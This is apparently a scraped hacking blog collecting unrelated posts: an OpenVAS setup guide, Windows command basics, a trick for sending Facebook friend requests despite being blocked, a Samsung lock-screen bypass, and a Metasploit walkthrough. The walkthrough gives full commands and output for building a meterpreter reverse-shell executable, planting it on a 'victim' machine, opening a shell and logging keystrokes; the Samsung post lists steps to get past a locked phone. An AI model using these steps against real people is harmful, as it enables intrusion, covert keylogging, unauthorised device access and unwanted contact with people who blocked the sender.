Open Vas web vulnerability scanner

Hello friends

today we are going to discuss how to install and use open vas. which is a open source web vulnerability scanner.

we will be doing this on kali linux.

now i guess you have installed the kali linux distribution.

if not do install it. if you don't know how to install the kali linux this tutorial might be not for you. still you cal learn how to install kali linux here.

now to install the open vas go here

applications> kali linux > vulnerability analysis > openvas >openvas-setup

it will download some stuff. like latest vulnerability database.

and the initiate some things which are required by it to work.

now it will start some plugins.

guys you might have heared about the GUI version of it but i am not gonna use it.

as it is not as good as what we are gonna use. it is the web version of the tool.

the default username is admin

it will take some time to start so don't panic due to it.

after a while it will ask you to enter a password.

remember to enter a strong a password as it will be a super user as root is in the linux.

Now open your browser.

and go to url https://127.0.0.1:9392

it will show you an error that it is and untrusted connection

just click on the i understand the risk as it is a self signed certificate of the error is genuine.

and add an exception in your browser.

now a login page will come in front of you

enter admin as username and password what you wrote in the command prompt.

now go to administration>NVT feed and click on synchronize with feed. it will update the vulnerability database of your application.

do same with SCAP and CERT feeds too.

now if you want to add users click on administration > users

write name password role and click on create user.

now you can see the user in the list of users.

now go to extras and click on target.

which is the first step in attacking.

name the target and set the ip address

or select a file with a list of ip address.

keep the port list untouched.

and click on create target.

now go to scan management and click on new task.

again enter the name of the scan and select the scan target.

the lower you select the more time it will take as it will become more detailed.

you can also schedule the scan.

and you can also add the observer.

no click on create task.

now you can see in your task a scan.

now in actions click on start.

now choose 10sec auto refresh. and click on refresh.

now when the bar reaches to 100 percent click on the date in the last section.

and you will get the report of it.

select the full report and you can download it in html.

the pdf is not working. so you have only one option which is better the n others it is html.

so use it as you can also edit it the way you want.

now edit it the way you want and give it to your client.

this post is written  by ManishBeingNegative.he is a  Security Researcher and Penetration Testor. He is also the owner of the XgenSecurity.

IMROTANT MESSAGE TO ALL VISITORS

THIS BLOG IS MOVED TO 

ANONYMOUSLEADER.BLOGSPOT.COM

THANKS KEEP VISITING AND SHARE IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Facebook smilies

• [[171108522930776]] Troll Face 
• [[164413893600463]] MEGUSTA 
• [[218595638164996]] YAO 
• [[189637151067601]] Lol 
• [[129627277060203]] Poker face. 
• [[227644903931785]] Forever ALONE. 
• [[100002752520227]] OKAY 
• [[105387672833401]] F**K YEA. 
• [[100002727365206]] CH AC. 
• [[125038607580286]] Forever alone navidad. 
• [[143220739082110]] FK KIDDING ME. 
• [[168040846586189]] Feel like a Sir. 
• [[169919399735055]] NOT BAD 
• [[142670085793927]] M O G. 
• [[170815706323196]] Cereal Guy 
• [[167359756658519]] NO 
• [[224812970902314]] Derp 
• [[192644604154319]] Derpina

Convert a text into mp3

Hi friends,

Today i'm sharing a website with you, its specially for those of you who want to convert their text  into  .mp3.
You just copy and paste your text or may be type the text in their given space and you can get it downloaded in mp3.
No matter how long the text is, it will convert that. You can also select between male and female voice and also you have multiple languages option. So here is the link,

  http://www.vozme.com

Hope you guys like it :))

Thanks,

Command Prompt Tricks+Hacks Premier

Hey guys how you been ? Hope you rockin it ;-)
Its been requested to make post on Command prompt commands , usage and other tricks. So i'll cover this part in parts .
Anyway if you want to know how to get IP then i have already posted on that , here is the link

Basic commands

• dir : it lists all the files and directory in current location
• cd : it takes the control to specified path. eg- suppose you are at c:\> and you type command cd users\public then it'll take you to c:\Users\Public>
• cd.. : it takes you one directory back
• systeminfo : it gives you all the information like processor,speed,hotfixes,RAM,hard-disk etc
• md  : it makes a folder of a name which u have to specify. eg md hello
• color : sets the color of command prompt and its text
• echo : it displays the message 
• echo message >> name.txt : it saves the message you have written to a file ,in this case , name.txt. 

SHUTDOWN

you can use command shutdown with various parameter . eg >>shutdown /s

• /l : it loggs you off
• /s : it shutdowns the computer
• /r : restarts the computer
• /a : it aborts the shutdown. suppose you have used shutdown /s . it'll shutdown the computer in less then a minute and within that minute if you use shutdown /a then the shutdown process will be aborted
• /p : turn offs the computer without any delay
• /h : it hibernates the computer 
• /s /c message : this combination shutdowns the computer with a message which you have to specify
• /m : it is used to shutdown a remote computer but for that you have to know the login ID and Password of remote computer :-)

SPECAIL COMMANDS

THERE ARE TWO COMMANDS WHICH ARE HELPFUL IN EVERY SITUATION

• HELP : THIS DISPLAYS ALL THE COMMANDS YOU CAN USE
• command /? : this is used to get the information about the specified command . suppose you want to know about md then you have to type md /?  and it'll display the information about that command.

These are very basic commands remember these . In next post i'll start batch file programming.  batch files are really interesting :-)


Hope you enjoyed this .. thanks for reading :)
Stay Tuned !!!
(comment and like plz )

How To Send Friend Requests On Facebook When You Are Blocked

With help of this trick you can send 1000′s of friend requests even if you are blocked. 
So without wasting time let’s start how this trick works?

If you are going to add some unknown person then you need the email address of that person to whom you are going to add. After you get the email address of the personal whom you want to send friend request either from his profile or any other way, follow these steps.

1) Go HERE


Here you will find a place to add a friends through their Emails based on the different Mail Services. But, if you’re thinking of adding too many people then it would be better that you create a contact file.

If you don’t know the easiest way to make contact file then follow these steps.
a) Open new text document (.txt) in notepad.
b) Add all the email addresses separated by a comma ( , ).
c) Now save that file with the extension .vcf
Now this is your contact file.

2) Upload this file to Facebook. and you will be prompted to send friend request.

NOTE : If you don’t know how to upload contact file then follow this step.

Go HERE
In that the last option is of ‘other tools’ in which you will find the next option to upload the file!


3) Click “OK”and You’re done.

Simple yet effective! Your friend request would be sent to desired people.

hack samsung password

How to Hack Samsung Phone Screen Lock

I have discovered another security flaw in Samsung Android phones. It is possible to completely disable the lock screen and get access to any app - even when the phone is "securely" locked with a pattern, PIN, password, or face detection. Unlike another recently released flaw, this doesn't rely quite so heavily on ultra-precise timing.

Video.

Of course, if you are unable to download a screen unlocker, this security vulnerability still allows you to dial any phone number and run any app!

HOWTO

1. From the lock screen, hit the emergency call button.
2. Dial a non-existent emergency services number - e.g. 0.
3. Press the green dial icon.
4. Dismiss the error message.
5. Press the phone's back button.
6. The app's screen will be briefly displayed.
7. This is just about long enough to interact with the app.
8. Using this, you can run and interact with any app / widget / settings menu.
9. You can also use this to launch the dialler.
10. From there, you can dial any phone number (one digit at a time) and place a phone call.
11. With Google Play, you can search for apps using the voice interface.
12. You can download apps from the app store which will disable the screen lock.

Impact

This does not occur on stock Android from Google. This flaw only seems to be present on Samsung's version of Android. I have only tested it on a Galaxy Note II running 4.1.2 - I believe it should work on Samsung Galaxy SIII. It may work on other devices from Samsung.

My test phone was running 4.1.2 with the Touchwiz launcher from Samsung.

Defending Against This Attack

Until Samsung release a patch, the only way this can be defended against is by completely removing the Samsung firmware and replacing it with a 3rd party ROM.
This ROM for the Galaxy S III claims to have fixed the problem.
I'm sure there will be ROMs for other Galaxy devices in due course.

Responsible Disclosure

I reported this flaw to Samsung in late February. They are working on a patch which they assure me will be released shortly.
I have delayed public disclosure of this vulnerability. I also asked if they wanted me to delay publication until a patch was ready - however they declined this offer.

If you discover a security issue with Samsung's mobile products, I strongly encourage you to email m.security AT samsung.com

They will provide their PGP public key if you wish to ensure your communications with them are secure.

Thanks

My thanks to Thang Chien of Vietnam, who first demonstrated a variant of this flaw in January.

Thanks also to David Rogers, Marc Rogers, Alec Muffett, andGlyn Wintle for their wisdom and advice around the subject of responsible disclosure. Any faults with this disclosure are mine and mine alone.

HACK WEBSITE USING BACKTRACK IN EASY EAY

--- The Metasploit Framework ---

Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.

Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself. However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.

Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.

Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

Now, what Metasploit IS?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

METASPLOIT ANTI FORENSICS:

Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)

2. Web Interface

3. MSF Console

4. MSFwx

5. MSFAPI

I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.

I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.

For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.

Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.

Let the Hacking Begin :

Open up backtrack. You should have a screen similar to this.

The default login credentials are:

Username: root

Pass: toor

Type in

root@bt:~#/etc/init.d/wicd start

to start the wicd manager

Finally, type "startx" to start the GUI mode:

root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:

root@bt:~#ifconfig

It would be something like 192.168.x.x or 10.x.x.x.

Have a note of it.

Now,

Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.

msf >

Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe

Your local IP is the one you noted earlier and for port you could select 4444.

(Everything has to be entered without quotes)

You should get something like this:

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: LHOST=192.168.255.130,LPORT=4444

root@bt:/opt/metasploit3/msf3#

Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.

Now open the 1^st shell window with msfconsole in it.

msf >

Type the following:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130

LHOST => 192.168.255.130

msf exploit(handler) > set LPORT 4444

LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.

And now, you have set the meterpreter to listen to you on port 4444.

The last step you have to do now, is to type in “exploit” and press enter,

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444

[*] Starting the payload handler...

Now, the payload is listening for all the incoming connections on port 444.

[*] Sending stage (749056 bytes) to 192.168.255.1

[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this

meterpreter >

Type in ps to list the active processes

meterpreter > ps

Search for explorer.exe and migrate to the process

meterpreter > migrate 5716

[*] Migrating to 5716...

[*] Migration completed successfully.

meterpreter >

Type in the following:

meterpreter > use priv

Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,

Jus type shell

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

You would now be having a command prompt,

Type in whoami, to see the computer’s name of victim :

C:\Windows\system32>whoami

whoami

win7-pc\win 7

C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.

Type in:

Let’s say the victim has typed in anything on his computer.

Just type exit, to return to meterpreter.

Now type in keyscan_dump, to see all the typed keystrokes :

meterpreter > keyscan_dump

Dumping captured keystrokes...

GaM3 0V3R

P.S.: The above information is just for educational purposes only. You should test it against the computer you own.